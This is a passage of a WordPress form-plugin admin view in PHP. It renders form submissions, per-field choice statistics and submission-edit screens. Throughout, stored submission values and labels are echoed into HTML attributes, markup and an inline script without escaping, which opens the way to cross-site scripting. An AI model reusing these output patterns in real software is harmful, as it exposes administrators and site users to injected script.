															<p><?php echo $temp[$g]->element_value; ?></p>
														</td>	
													<?php }	
												}	
												else{
													?>
													<td class="<?php echo $sorted_labels_id[$h];?>_fc sub-align" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>>
														<p><?php echo str_replace("***br***", '<br>', stripslashes($temp[$g]->element_value)) ; ?></p>
													</td>
													<?php   
												}
											}	
											$not_label = FALSE;
										}
									}
									if ($not_label) {
										?>
										<td class="<?php echo $sorted_labels_id[$h];?>_fc sub-align" id="<?php echo $sorted_labels_id[$h]; ?>_fc" <?php echo $styleStr; ?>><p>&nbsp;</p></td>
										<?php
									}
								}
								if ($ispaypal) {
									$styleStr = $this->model->hide_or_not($lists['hide_label_list'], '@payment_info@');
									?>
									<td class="table_large_col payment_info_fc sub-align" id="payment_info_fc" <?php echo $styleStr; ?>>
										<a class="thickbox-preview" href="<?php echo add_query_arg(array('action' => 'paypal_info', 'id' => $i, 'width' => '600', 'height' => '500', 'TB_iframe' => '1'), admin_url('admin-ajax.php')); ?>">
											<img src="<?php echo WD_FMC_URL . '/images/info.png'; ?>" />
										</a>
									</td>
									<?php
								}
								?>
							</tr>
							<?php
							$k = 1 - $k;
						}
						?>
					</table>
				</div>	 
				<?php
				if ($sorted_label_types) {
					foreach ($sorted_label_types as $key => $sorted_label_type) {
						if ($this->model->check_radio_type($sorted_label_type)) {
							$is_stats = true;
							break;
						}
					}
					if ($is_stats) {
						$ajax_nonce = wp_create_nonce( "nonce_fmc_ajax" );
						?>
						<br/>
						<div class="fm-statistics">
							<h1>Statistics</h1>		
							<table class="stats">
								<tr>
									<td>
										<label for="sorted_label_key">Select a Field:</label>
									</td>
									<td>
										<select id="sorted_label_key">
											<option value="">Select a Field</option>
											<?php 
											foreach ($sorted_label_types as $key => $sorted_label_type) {
												if ($sorted_label_type=="type_checkbox" || $sorted_label_type=="type_radio" || $sorted_label_type=="type_own_select" || $sorted_label_type=="type_country" || $sorted_label_type=="type_paypal_select" || $sorted_label_type=="type_paypal_radio" || $sorted_label_type=="type_paypal_checkbox" || $sorted_label_type=="type_paypal_shipping") {				  
													?>
													<option value="<?php echo $key; ?>"><?php echo $sorted_label_names_original[$key]; ?></option>
													<?php
												}
											}
											?>
										</select>
									</td>
									<td></td>
								</tr>
								<tr>
									<td>
										<label>Select a Date:</label>
									</td>
									<td>
										From: <input class="inputbox"  type="text" name="startstats" id="startstats" size="9" maxlength="9" />
										  <input type="reset" class="button" style="width: 22px;"  value="..." name="startstats_but" id="startstats_but" onclick="return showCalendar('startstats','%Y-%m-%d');" /> 
											 
										To: <input class="inputbox" type="text" name="endstats" id="endstats" size="9" maxlength="9" />
										<input type="reset" class="button" style="width: 22px;"  value="..." name="endstats_but" id="endstats_but" onclick="return showCalendar('endstats','%Y-%m-%d');" />
									</td>
									<td>
										<button onclick="show_stats(); return false;">Show</button>
									</td>
								</tr>
							</table>
							
							<div id="div_stats"></div>	
						</div>
						<script>
						function show_stats() { 
							jQuery('#div_stats').html('<div class="fm-loading-container"><div class="fm-loading-content"></div></div>');
							if(jQuery('#sorted_label_key').val()!="") {	 	  
								jQuery('#div_stats').load('<?php echo add_query_arg(array('action' => 'get_stats_fmc', 'page' => 'submissions_fmc'), admin_url('admin-ajax.php')); ?>', { 
									'task': 'show_stats',
									'form_id' : '<?php echo $form_id; ?>',
									'sorted_label_key' : jQuery('#sorted_label_key').val(),
									'startdate' : jQuery('#startstats').val(), 
									'enddate' : jQuery('#endstats').val(),
									'nonce_fmc_ajax': '<?php echo $ajax_nonce; ?>'
								});
							}		
							else {
								jQuery('#div_stats').html("<div style='padding:10px 5px; color:red; font-size:14px;'>Please select the field!</div>");
							}	
							jQuery("#div_stats").removeClass("fm_loading");
						}
						</script>
						<?php	
					}
				}
				?>
			</div>	
		</form>	
		<script> 
		function fm_scroll(element) {
			var scrollbar= document.createElement('div');
			scrollbar.appendChild(document.createElement('div'));
			scrollbar.style.overflow= 'auto';
			scrollbar.style.overflowY= 'hidden';
			scrollbar.firstChild.style.width= element.scrollWidth+'px';
			scrollbar.firstChild.style.paddingTop= '1px';
			scrollbar.firstChild.appendChild(document.createTextNode('\xA0'));
			scrollbar.onscroll= function() {
				element.scrollLeft= scrollbar.scrollLeft;
			};
			element.onscroll= function() {
				scrollbar.scrollLeft= element.scrollLeft;
			};
			element.parentNode.insertBefore(scrollbar, element);
		}
		jQuery(window).load(function() {
			fm_popup();
			fm_scroll(document.getElementById('fm-scroll'));
			if (typeof jQuery().fancybox !== 'undefined' && jQuery.isFunction(jQuery().fancybox)) {
				jQuery(".fm_fancybox").fancybox({
					'maxWidth ' : 600,
					'maxHeight' : 500
				});
			}
		});
		<?php if ($ka_fielderov_search) { ?> 
			document.getElementById('fields_filter').style.display = '';
        <?php } ?>
		</script>
		<?php
	}

	public function show_stats($form_id) {
		$key = (isset($_POST['sorted_label_key']) ? esc_html(stripslashes($_POST['sorted_label_key'])) : ''); 
		$labels_parameters = $this->model->get_labels_parameters($form_id);
		$where_choices = $labels_parameters[7];
		$sorted_label_names_original = $labels_parameters[4];
		$sorted_labels_id = $labels_parameters[0];	 
		if(count($sorted_labels_id)!=0 && $key < count($sorted_labels_id)  ) { 
			$choices_params = $this->model->statistic_for_radio($where_choices, $sorted_labels_id[$key]);
			$sorted_label_name_original = $sorted_label_names_original[$key];
			$choices_count = $choices_params[0];
			$choices_labels = $choices_params[1];
			$unanswered = $choices_params[2];
			$all = $choices_params[3];
			$colors = $choices_params[4];	  
			$choices_colors = $choices_params[5];	  
		}
		else {
			$choices_labels = array();
			$sorted_label_name_original = '';
			$unanswered = NULL;
			$all = 0;
		}
		?>
		<br/>
		<br/>
		<div class="field-label"><?php echo stripslashes($sorted_label_name_original); ?></div>
		<table class="adminlist">
			<thead>
				<tr>
					<th width="20%">Choices</th>
					<th>Percentage</th>
					<th width="10%">Count</th>
				</tr>
			</thead>
			<?php
			$k=0;
			foreach ($choices_labels as $key => $choices_label) {
				if (strpos($choices_label, "***quantity***")) {
					$choices_label = str_replace("***quantity***", " ", $choices_label);
				}
				if (strpos($choices_label, "***property***")) {
					$choices_label = str_replace("***property***", " ", $choices_label);
				}
				?>
				<tr>
					<td class="label<?php echo $k; ?>"><?php echo str_replace("***br***",'<br>', $choices_label)?></td>
					<td>
						<div class="bordered" style="width:<?php echo ($choices_count[$key]/($all-$unanswered))*100; ?>%; height:16px; background-color:<?php echo $colors[$key % 2]; ?>; float: left;">
						</div>
						<div <?php echo ($choices_count[$key]/($all-$unanswered)!=1 ? 'class="bordered'.$k.'"' : "") ?> style="width:<?php echo 100-($choices_count[$key]/($all-$unanswered))*100; ?>%; height:16px; background-color:#F2F0F1; float: left;">
						</div>
					</td>
					<td>
						<div>
							<div style="width: 0; height: 0; border-top: 8px solid transparent;border-bottom: 8px solid transparent; border-right:8px solid <?php echo $choices_colors[$key % 2]; ?>; float:left;">
							</div>
							<div style="background-color:<?php echo $choices_colors[$key % 2]; ?>; height:16px; width:16px; text-align: center; margin-left:8px; color: #fff;">
							<?php echo $choices_count[$key]?>
							</div>
						</div>
					</td>
				</tr>
				<tr>
					<td colspan="3">
					</td>
				</tr>
				<?php
				$k = 1 - $k;
			}
			if($unanswered){
				?>
				<tr>
					<td colspan="2" style="text-align:right; color: #000;">Unanswered</th>
					<td><strong style="margin-left:10px;"><?php echo $unanswered;?></strong></th>
				</tr>
				<?php	
			}
			?>
			<tr>
				<td colspan="2" style="text-align:right; color: #000;"><strong>Total</strong></th>
				<td><strong style="margin-left:10px;"><?php echo $all;?></strong></th>
			</tr>
		</table>
		<?php
		die();
	}

  public function edit($id) {
    $current_id = ((isset($id)) ? $id : 0);
    $params = $this->model->get_data_of_group_id($current_id);
    $rows = $params[0];
    $labels_id = $params[1];
    $labels_name = $params[2];
    $labels_type = $params[3];
    $ispaypal = $params[4];
	$userinfo = get_userdata($rows[0]->user_id_wd);
	$username = $userinfo ? $userinfo->display_name : "";
	$useremail = $userinfo ? $userinfo->user_email : "";
	
    ?>
    <form action="admin.php?page=submissions_fmc" method="post" id="adminForm" name="adminForm">
      <?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
      <table width="99%">
        <tbody>
          <tr>
            <td width="100%"><h2>Edit Submission</h2></td>
            <td align="right">
              <input type="button" onclick="fm_set_input_value('task', 'save');						  
                                            fm_set_input_value('current_id', <?php echo $current_id; ?>);
                                            fm_form_submit(event, 'adminForm');" value="Save" class="button-secondary action">
            </td>
            <td align="right">
              <input type="button" onclick="fm_set_input_value('task', 'apply');						  
                                            fm_set_input_value('current_id', <?php echo $current_id ;?>);
                                            fm_form_submit(event, 'adminForm');" value="Apply" class="button-secondary action">
            </td>
            <td align="right">
              <input type="button" onclick="fm_set_input_value('task', '');fm_form_submit(event, 'adminForm');" value="Cancel" class="button-secondary action">
            </td>
          </tr>
        </tbody>
      </table>
      <table class="admintable">
        <tr>
          <td class="key"><label for="ID">ID: </label></td>
          <td><?php echo $rows[0]->group_id; ?></td>
        </tr>
        <tr>
          <td class="key"><label for="Date">Date: </label></td>
          <td><?php echo $rows[0]->date; ?></td>
        </tr>
        <tr>
          <td class="key"><label for="IP">IP: </label></td>
          <td><?php echo $rows[0]->ip; ?></td>
        </tr>
		
		
		<tr>
          <td class="key"><label for="Submitter's Username">Submitter's Username: </label></td>
          <td><?php echo $username; ?></td>
        </tr>
		<tr>
          <td class="key"><label for="Submitter's Email Address">Submitter's Email Address: </label></td>
          <td><?php echo $useremail; ?></td>
        </tr>
        <?php
        foreach ($labels_id as $key => $label_id) {
          if ($this->model->check_type_for_edit_function($labels_type[$key])) {
            $element_value = $this->model->check_for_submited_label($rows, $label_id);
            if ($element_value == "continue") {
              continue;
            }
            switch ($labels_type[$key]) {
              case 'type_checkbox':
                $choices = explode('***br***', $element_value);
                $choices = array_slice($choices, 0, count($choices) - 1);
                ?>
				<tr>
          <td class="key" rowspan="<?php echo count($choices); ?>">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
                <?php
                foreach ($choices as $choice_key => $choice) {
                  ?>
				  <td>
            <input type="text" name="submission_<?php echo $label_id.'_'.$choice_key; ?>" id="submission_<?php echo $label_id.'_'.$choice_key; ?>" value="<?php echo $choice; ?>" size="80" />
				  </td>
				</tr>
                  <?php
                }
                break;
              case 'type_paypal_payment_status':
                ?>
				<tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <select name="submission_0" id="submission_0" >
              <option value=""></option>
              <option value="Canceled" >Canceled</option>
              <option value="Cleared" >Cleared</option>
              <option value="Cleared by payment review" >Cleared by payment review</option>
              <option value="Completed" >Completed</option>
              <option value="Denied" >Denied</option>
              <option value="Failed" >Failed</option>
              <option value="Held" >Held</option>
              <option value="In progress" >In progress</option>
              <option value="On hold" >On hold</option>
              <option value="Paid" >Paid</option>
              <option value="Partially refunded" >Partially refunded</option>
              <option value="Pending verification" >Pending verification</option>
              <option value="Placed" >Placed</option>
              <option value="Processing" >Processing</option>
              <option value="Refunded" >Refunded</option>
              <option value="Refused" >Refused</option>
              <option value="Removed" >Removed</option>
              <option value="Returned" >Returned</option>
              <option value="Reversed" >Reversed</option>
              <option value="Temporary hold" >Temporary hold</option>
              <option value="Unclaimed" >Unclaimed</option>
            </select>	
            <script> 
              var element = document.getElementById("submission_0");
              element.value = "<?php echo $element_value; ?>";
            </script>
			    </td>
				</tr>
                <?php
                break;
              case 'type_star_rating':
                $star_rating_array = $this->model->images_for_star_rating($element_value, $label_id);
                $edit_stars = $star_rating_array[0];
                $stars_value = $star_rating_array[1];
                ?>
        <tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <input type="hidden" id="<?php echo $label_id; ?>_star_amountform_id_temp" name="<?php echo $label_id; ?>_star_amountform_id_temp" value="<?php echo $stars_value[0]; ?>">
            <input type="hidden" name="<?php echo $label_id; ?>_star_colorform_id_temp" id="<?php echo $label_id; ?>_star_colorform_id_temp" value="<?php echo $stars_value[2]; ?>">
            <input type="hidden" id="<?php echo $label_id; ?>_selected_star_amountform_id_temp" name="<?php echo $label_id; ?>_selected_star_amountform_id_temp" value="<?php echo $stars_value[1]; ?>">
            <?php echo $edit_stars; ?>
            <input type="hidden" name="submission_<?php echo $label_id; ?>" id="submission_<?php echo $label_id; ?>" value="<?php echo $element_value; ?>" size="80" />
          </td>
        </tr>
                <?php
                break;
              case "type_scale_rating":
                $scale_rating_array = $this->model->params_for_scale_rating($element_value, $label_id);
                $scale = $scale_rating_array[0];
                $scale_radio = $scale_rating_array[1];
                $checked = $scale_rating_array[2];
                ?>
				<tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <input type="hidden" id="<?php echo $label_id; ?>_scale_checkedform_id_temp" name="<?php echo $label_id; ?>_scale_checkedform_id_temp" value="<?php echo $scale_radio[1]; ?>">
            <?php echo $scale; ?>
            <input type="hidden" name="submission_<?php echo $label_id; ?>" id="submission_<?php echo $label_id; ?>" value="<?php echo $element_value; ?>" size="80" />
          </td>
				</tr>
                <?php
                break;
              case 'type_range':
                $range = $this->model->params_for_type_range($element_value, $label_id);
                ?>
				<tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <?php echo $range; ?>
            <input type="hidden" name="submission_<?php echo $label_id; ?>" id="submission_<?php echo $label_id; ?>" value="<?php echo $element_value; ?>" size="80" />
          </td>
				</tr>
                <?php
                break;
              case 'type_spinner':
                ?>
				<tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <input type="text" name="submission_<?php echo $label_id; ?>" id="submission_<?php echo $label_id; ?>" value="<?php echo str_replace("*@@url@@*", '', $element_value); ?>" size="20" />
          </td>
        </tr>
                <?php
                break;
              case 'type_grading':
                $type_grading_array = $this->model->params_for_type_grading($element_value, $label_id);
                $garding = $type_grading_array[0];
                $garding_value = $type_grading_array[1];
                $sum = $type_grading_array[2];
                $items_count = $type_grading_array[3];
                $element_value1 = $type_grading_array[4];
                ?>
				<tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <?php echo $garding; ?>
            <span id="<?php echo $label_id; ?>_grading_sumform_id_temp"><?php echo $sum; ?></span>/<span id="<?php echo $label_id; ?>_grading_totalform_id_temp"><?php echo $garding_value[$items_count]; ?></span><span id="<?php echo $label_id; ?>_text_elementform_id_temp"></span>
            <input type="hidden"  id="<?php echo $label_id; ?>_element_valueform_id_temp" name="<?php echo $label_id; ?>_element_valueform_id_temp" value="<?php echo $element_value1; ?>" />
            <input type="hidden"  id="<?php echo $label_id; ?>_grading_totalform_id_temp" name="<?php echo $label_id; ?>_grading_totalform_id_temp" value="<?php echo $garding_value[$items_count]; ?>" />
            <input type="hidden" name="submission_<?php echo $label_id; ?>" id="submission_<?php echo $label_id; ?>" value="<?php echo $element_value; ?>" size="80" />
          </td>
				</tr>
                <?php
                break;
              case 'type_matrix':
                $type_matrix_array = $this->model->params_for_type_matrix($element_value, $label_id);
                $matrix = $type_matrix_array[0];
                $new_filename = $type_matrix_array[1];
                ?>
				<tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <input type="hidden"  id="<?php echo $label_id; ?>_matrixform_id_temp" name="<?php echo $label_id; ?>_matrixform_id_temp" value="<?php echo $new_filename; ?>">
            <?php echo $matrix; ?>
            <input type="hidden" name="submission_<?php echo $label_id; ?>" id="submission_<?php echo $label_id; ?>" value="<?php echo $element_value; ?>" size="80" />
          </td>
				</tr>
                <?php
                break;
              default: 
              ?>
				<tr>
          <td class="key">
            <label for="title"><?php echo $labels_name[$key]; ?></label>
          </td>
          <td>
            <input type="text" name="submission_<?php echo $label_id; ?>" id="submission_<?php echo $label_id; ?>" value="<?php echo str_replace("*@@url@@*", '', $element_value); ?>" size="80" />
          </td>
        </tr>
              <?php
                break;
            }
          }
        }
        ?>
      </table>
      <input type="hidden" name="option" value="com_formmaker"/>
      <input type="hidden" id="current_id" name="current_id" value="<?php echo $rows[0]->group_id; ?>" />
      <input type="hidden" name="form_id" value="<?php echo $rows[0]->form_id; ?>" />
      <input type="hidden" name="date" value="<?php echo $rows[0]->date; ?>" />
      <input type="hidden" name="ip" value="<?php echo $rows[0]->ip; ?>" />
      <input type="hidden" id="task" name="task" value="" />
      <input type="hidden" value="<?php echo WD_FMC_URL; ?>" id="form_plugins_url" />
      <script>
        plugin_url = document.getElementById('form_plugins_url').value;
      </script>
    </form>
	  <?php
  }

  public function new_edit($id) {
    $current_id = ((isset($id)) ? $id : 0);
    $params = $this->model->get_data_of_group_id($current_id);
    $rows = $params[0]; 
    $labels_id = $params[1]; 
    $labels_name = $params[2]; 
    $labels_type = $params[3];
    $ispaypal = $params[4];
    $form = $params[5];
    $form_theme = $params[6];
    $userinfo = get_userdata($rows[0]->user_id_wd);
    $username = $userinfo ? $userinfo->display_name : "";
    $useremail = $userinfo ? $userinfo->user_email : "";
    ?>
	<div class="fm-user-manual">
		This section allows you to edit form submissions.
		<a style="color: blue; text-decoration: none;" target="_blank" href="https://web-dorado.com/wordpress-form-maker-guide-6.html">Read More in User Manual</a>
	</div>
	<div class="fm-upgrade-pro">
		<a target="_blank" href="https://web-dorado.com/files/fromContactForm.php">
			<div class="fm-upgrade-img">
				UPGRADE TO PRO VERSION 
				<span></span>
			</div>
		</a>
	</div>
	<div class="fm-clear"></div>
    <form action="admin.php?page=submissions_fmc"  method="post" id="formform_id_temp" name="formform_id_temp">
		<?php wp_nonce_field('nonce_fmc', 'nonce_fmc'); ?>
		<div class="fm-page-header">
			<div class="fm-page-title">Edit Submission</div>
			<div class="fm-page-actions">
				<button class="fm-button save-button small" onclick="pressbutton(); fm_set_input_value('task', 'save');	 fm_set_input_value('current_id', <?php echo $current_id ;?>); fm_form_submit(event, 'formform_id_temp');">
					<span></span>
					Save
				</button>
				<button class="fm-button apply-button small" onclick="pressbutton(); fm_set_input_value('task', 'apply');	 fm_set_input_value('current_id', <?php echo $current_id ;?>); fm_form_submit(event, 'formform_id_temp');">
					<span></span>
					Apply
				</button>
				<button class="fm-button cancel-button small" onclick="fm_set_input_value('task', '');fm_form_submit(event, 'formform_id_temp');">
					<span></span>
					Cancel
				</button>
			</div>
			<div class="fm-clear"></div>
		</div>
		<div class="fm-submissins-edit">
		<table>
			<tr>
				<td class="fm-key"><label for="ID">ID: </label></td>
				<td><?php echo $rows[0]->group_id; ?></td>
			</tr>	
			<tr>
				<td class="fm-key"><label for="Date">Date: </label></td>
				<td><?php echo $rows[0]->date; ?></td>
			</tr>
			<tr>
				<td class="fm-key"><label for="IP">IP: </label></td>
				<td><?php echo $rows[0]->ip; ?></td>
			</tr>
			<tr>
				<td class="fm-key"><label for="Submitter's Username">Submitter's Username: </label></td>
				<td><?php echo $username; ?></td>
			</tr>
			<tr>
				<td class="fm-key"><label for="Submitter's Email Address">Submitter's Email Address: </label></td>
				<td><?php echo $useremail; ?></td>
			</tr>
		</table>
		<?php
		$css_rep1 = array("[SITE_ROOT]");
		$css_rep2 = array(WD_FMC_URL);
		$order = array("\r\n", "\n", "\r");
		$form_theme = str_replace($order, '', $form_theme);
		$form_theme = str_replace($css_rep1, $css_rep2, $form_theme);
		$form_theme = "#form" . $form->id . ' ' . $form_theme;
		?>
		<style>
        <?php
        echo $form_theme;
        ?>
        .wdform-page-and-images{
          width: 50%;
        }
        .wdform-page-and-images div {
          background-color: rgba(0, 0, 0, 0);
        }
      </style>
      <?php	
      $form_currency = '$';
      $check_js = '';
      $onload_js = '';
      $onsubmit_js = '';
      $currency_code = array('USD', 'EUR', 'GBP', 'JPY', 'CAD', 'MXN', 'HKD', 'HUF', 'NOK', 'NZD', 'SGD', 'SEK', 'PLN', 'AUD', 'DKK', 'CHF', 'CZK', 'ILS', 'BRL', 'TWD', 'MYR', 'PHP', 'THB');
      $currency_sign = array('$'  , '€'  , '£'  , '¥'  , 'C$', 'Mex$', 'HK$', 'Ft' , 'kr' , 'NZ$', 'S$' , 'kr' , 'zl' , 'A$' , 'kr' , 'CHF' , 'Kc', '?'  , 'R$' , 'NT$', 'RM' , '?'  , '?'  );
      $is_type	= array();
      $id1s = array();
      $types = array();
      $labels = array();
      $paramss = array();
      $fields = explode('*:*new_field*:*', $form->form_fields);
      $fields = array_slice($fields, 0, count($fields) - 1);   
      foreach ($fields as $field) {
        $temp = explode('*:*id*:*',$field);
        array_push($id1s, $temp[0]);
        $temp = explode('*:*type*:*', $temp[1]);
        array_push($types, $temp[0]);
        $temp = explode('*:*w_field_label*:*', $temp[1]);
        array_push($labels, $temp[0]);
        array_push($paramss, $temp[1]);
      }
      $form = $form->form_front;
      $form_id = 'form_id_temp';
      $start = 0;
      foreach ($id1s as $id1s_key => $id1) {
        $label = $labels[$id1s_key];
        $type = $types[$id1s_key];
        $params = $paramss[$id1s_key];
        if ($type != 'type_address') {
          foreach ($rows as $row) {
            if ($row->element_label == $id1) {		
              $element_value =	$row->element_value;
              break;
            }
            else {
              $element_value =	'';
            }
          }
        }
        else {
          for ($i = 0; $i < 6; $i++) {
            $address_value = '';
            foreach ($rows as $row) {
              if ($row->element_label == (string)((int) $id1 + $i)) {
                $address_value = $row->element_value;
              }
            }
            $elements_of_address[$i] = $address_value;
          }
        }
        if (strpos($form, '%' . $id1 . ' - ' . $label . '%')) {
          $rep = '';
          $param = array();
          $param['attributes'] = '';
          $is_type[$type] = TRUE;
          switch ($type) {
            case 'type_section_break':
            case 'type_editor':
            case 'type_file_upload':
            case 'type_captcha':		
            case 'type_recaptcha':
            case 'type_mark_map':	
            case 'type_map':
            case 'type_submit_reset':
            case 'type_button':
            case 'type_paypal_total':
              break;
            
            case 'type_text': {
              $params_names = array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required','w_unique');
              $temp = $params;
              foreach ($params_names as $params_name ) {
                $temp = explode('*:*'.$params_name.'*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {	
                $temp	= explode('*:*w_attr_name*:*', $temp);
                $attrs = array_slice($temp, 0, count($temp) - 1);   
                foreach ($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $wdformfieldsize = ($param['w_field_label_pos'] == "left" ? $param['w_field_label_size']+$param['w_size'] : max($param['w_field_label_size'],$param['w_size']));
              $param['w_field_label_pos'] = ($param['w_field_label_pos'] == "left" ? "float: left;" : "display:block;");
              $rep ='<div type="type_text" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              $rep.='</div><div class="wdform-element-section" style="width: '.$param['w_size'].'px;"  ><input type="text" class="" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$element_value.'" style="width: 100%;" '.$param['attributes'].'></div></div>';
              break;
            }

            case 'type_number': {
              $params_names = array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required','w_unique','w_class');
              $temp = $params;
              foreach ($params_names as $params_name ) {	
                $temp = explode('*:*'.$params_name.'*:*', $temp);
                $param[$params_name] = $temp[0];
                $temp = $temp[1];
              }
              if ($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }				
              
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size'] : max($param['w_field_label_size'],$param['w_size']));	
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
              
              $rep ='<div type="type_number" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section"  class="'.$param['w_class'].'" style="'.$param['w_field_label_pos'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_size'].'px;"><input type="text" class="" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$element_value.'"  style="width: 100%;" '.$param['attributes'].'></div></div>';
              
              break;
            }

            case 'type_password': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_required','w_unique','w_class');
              $temp=$params;

              foreach($params_names as $params_name ) {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
                        
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
          
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size'] : max($param['w_field_label_size'],$param['w_size']));	
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                

              $rep ='<div type="type_password" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section"  class="'.$param['w_class'].'" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_size'].'px;"><input type="password" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$element_value.'" style="width: 100%;" '.$param['attributes'].'></div></div>';
              
              
              break;
            }

            case 'type_textarea': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size_w','w_size_h','w_first_val','w_title','w_required','w_unique','w_class');
              $temp=$params;

              foreach($params_names as $params_name ) {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
            
            
                
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size_w'] : max($param['w_field_label_size'],$param['w_size_w']));	
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
            
            
              $rep ='<div type="type_textarea" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_size_w'].'px"><textarea class="" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" title="'.$param['w_title'].'"  style="width: 100%; height: '.$param['w_size_h'].'px;" '.$param['attributes'].'>'.$element_value.'</textarea></div></div>';

              

              break;
            }

            case 'type_wdeditor': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size_w','w_size_h','w_title','w_required','w_class');
              $temp=$params;
            
              foreach($params_names as $params_name ) {	
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
                      
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size_w']+10 : max($param['w_field_label_size'],$param['w_size_w']));	
              $param['w_field_label_pos'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "display:block;");	
                                    
              $rep ='<div type="type_wdeditor" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
            
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="width: '.$param['w_size_w'].'px">';
              
              if(user_can_richedit()) {
                ob_start();
                wp_editor($element_value, 'wdform_'.$id1.'_wd_editor'.$form_id, array('teeny' => FALSE, 'media_buttons' => FALSE, 'textarea_rows' => 5));
                $wd_editor = ob_get_clean();
              }
              else {
                $wd_editor='
                <textarea  class="'.$param['w_class'].'" name="wdform_'.$id1.'_wd_editor'.$form_id.'" id="wdform_'.$id1.'_wd_editor'.$form_id.'" style="width: '.$param['w_size_w'].'px; height: '.$param['w_size_h'].'px; " class="mce_editable" aria-hidden="true">'.$element_value.'</textarea>';
              }	
              
              $rep.= $wd_editor.'</div></div>';
      
              break;
            }

            case 'type_phone': {
            
              if($element_value=='')
                $element_value = ' ';
                
                $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_mini_labels','w_required','w_unique', 'w_class');
                $temp=$params;

                foreach($params_names as $params_name ) {	
                  $temp=explode('*:*'.$params_name.'*:*',$temp);
                  $param[$params_name] = $temp[0];
                  $temp=$temp[1];
                } 
                
                if($temp) {	
                  $temp	=explode('*:*w_attr_name*:*',$temp);
                  $attrs	= array_slice($temp,0, count($temp)-1);   
                  foreach($attrs as $attr)
                    $param['attributes'] = $param['attributes'].' '.$attr;
                }
                
                $element_value = explode(' ',$element_value);
              
                $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']+65) : max($param['w_field_label_size'],($param['w_size']+65)));	
